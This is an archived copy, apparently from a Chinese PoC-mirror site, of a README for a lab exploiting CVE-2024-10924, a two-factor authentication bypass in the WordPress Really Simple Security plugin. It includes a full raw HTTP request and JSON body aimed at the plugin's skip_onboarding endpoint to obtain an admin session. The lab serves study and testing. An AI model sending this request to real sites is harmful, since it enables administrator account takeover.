支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
立即捐款

POC详情: 5836471f6358636acaba6c937268cd483e5555a5

来源
https://github.com/D1se0/CVE-2024-10924-Bypass-MFA-Wordpress-LAB
关联漏洞
标题:WordPress plugin Really Simple Security 安全漏洞 (CVE-2024-10924)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Really Simple Security 9.0.0版本到9.1.1.1版本存在安全漏洞,该漏洞源于包含一个身份验证绕过漏洞。
介绍
# CVE-2024-10924 Bypass MFA WordPress - Exploit Lab

This repository provides a lab for exploiting the `CVE-2024-10924` vulnerability in `WordPress`, specifically to bypass `two-factor authentication (MFA)` and gain access to the `WordPress` administration panel.

## Prerequisites

To deploy this lab in your environment, follow the steps below:

## **Deploy WordPress on VMware**

You will have to unzip the `zip` of the LAB, going to VMWare you will have to click on `Open` to import a machine, we select the file called `Ubuntu-Bypass-MFA-Wordpress.vmx`, and finally we will have to click on `Power` to turn on the vulnerable machine.

[Download LAB](https://drive.google.com/file/d/1a8h6HHDFfkyZRGUdvXdQtcYxLiXH8n_I/view?usp=sharing)

## **Configure Kali Linux**

On your Kali machine, install the necessary tools and make sure you have the following applications installed:

- `nmap`: To perform network scans.
- `requests`: To make HTTP requests (if you don't have it, install `requests` with `pip install requests`).
- `rich`: For elegant output to the console (install with `pip install rich`).

## **Get WordPress machine IP**

To get the IP of the WordPress machine in the network environment, run the following script from your Kali machine:

```bash
$ python3 knowIPwordpress.py
```
```
This script does the following:
```

Detect your local `IP`.
Scans the corresponding network segment to find active `IPs`.
Perform a port scan for `HTTP` services.
Check that the WordPress machine's `IP` has the title `"Bypass-MFA"` in its `HTTP` service.
Once found, it will show you the `URL` where you can access the `WordPress` administration panel:

```bash
Accede a WordPress en: http://<IP>/wp-admin
```

## Double Check Bypass (MFA):

### Credentials Wordpress:

```
admin:admin
```

When you try to log in to `WordPress`, it will ask you for `two-factor verification (MFA)`. To bypass this step, run the following script on your `Kali`:

```bash
$ python3 bypass-MFA-Wordpress.py
```

How the `bypass-MFA-Wordpress.py` script works
This script exploits the `CVE-2024-10924` vulnerability and bypasses double verification to gain access to the `WordPress` administration panel.

## Script flow:
Get session cookie: The script makes an `HTTP` request to the `reallysimplessl/v1/two_fa/skip_onboarding` endpoint to obtain a valid session cookie.

The request is sent with the following information:

```json
{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}
```

## Login Request: 
Once the cookie is obtained, the script requests the `WordPress` username and password. Then, make a `POST` request to the `wp-admin/profile.php` endpoint with the provided credentials to log in.

## Generation of an HTML file: 
If the bypass is successful, the script saves the response from the administrator dashboard to a `.html` file and opens it in your default browser.

You will now have access to the `WordPress` administration panel!

## Manual way Bypass-MFA-Wordpress:

If you want to do it manually with `BurpSuite` and we want to know the `Endpoint` to which we have to send the request in order to capture the `Cookies`, we can do it in the following way

```bash
$ python3 endpointWordpress.py
```

This will tell us the code that we will have to put in `BurpSuite` to be able to capture the `Cookies`, in my case it would be something like this:

```json
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}
```

## More information in my YT video:

LINK = [Video CVE-2024-10924-Bypass-MFA-Wordpress-LAB](LINK)
文件快照

 [4.0K]  /data/pocs/5836471f6358636acaba6c937268cd483e5555a5
├── [4.3K]  bypass-MFA-Wordpress.py
├── [1.5K]  endpointWordpress.py
├── [4.6K]  knowIPwordpress.py
├── [4.0K]  plugin_vuln
│   └── [1.3M]  really-simple-ssl.zip
├── [3.7K]  README.md
└── [4.0K]  wordpressIMG-VMWare
    └── [ 144]  DownloadLABWordpress.md

2 directories, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。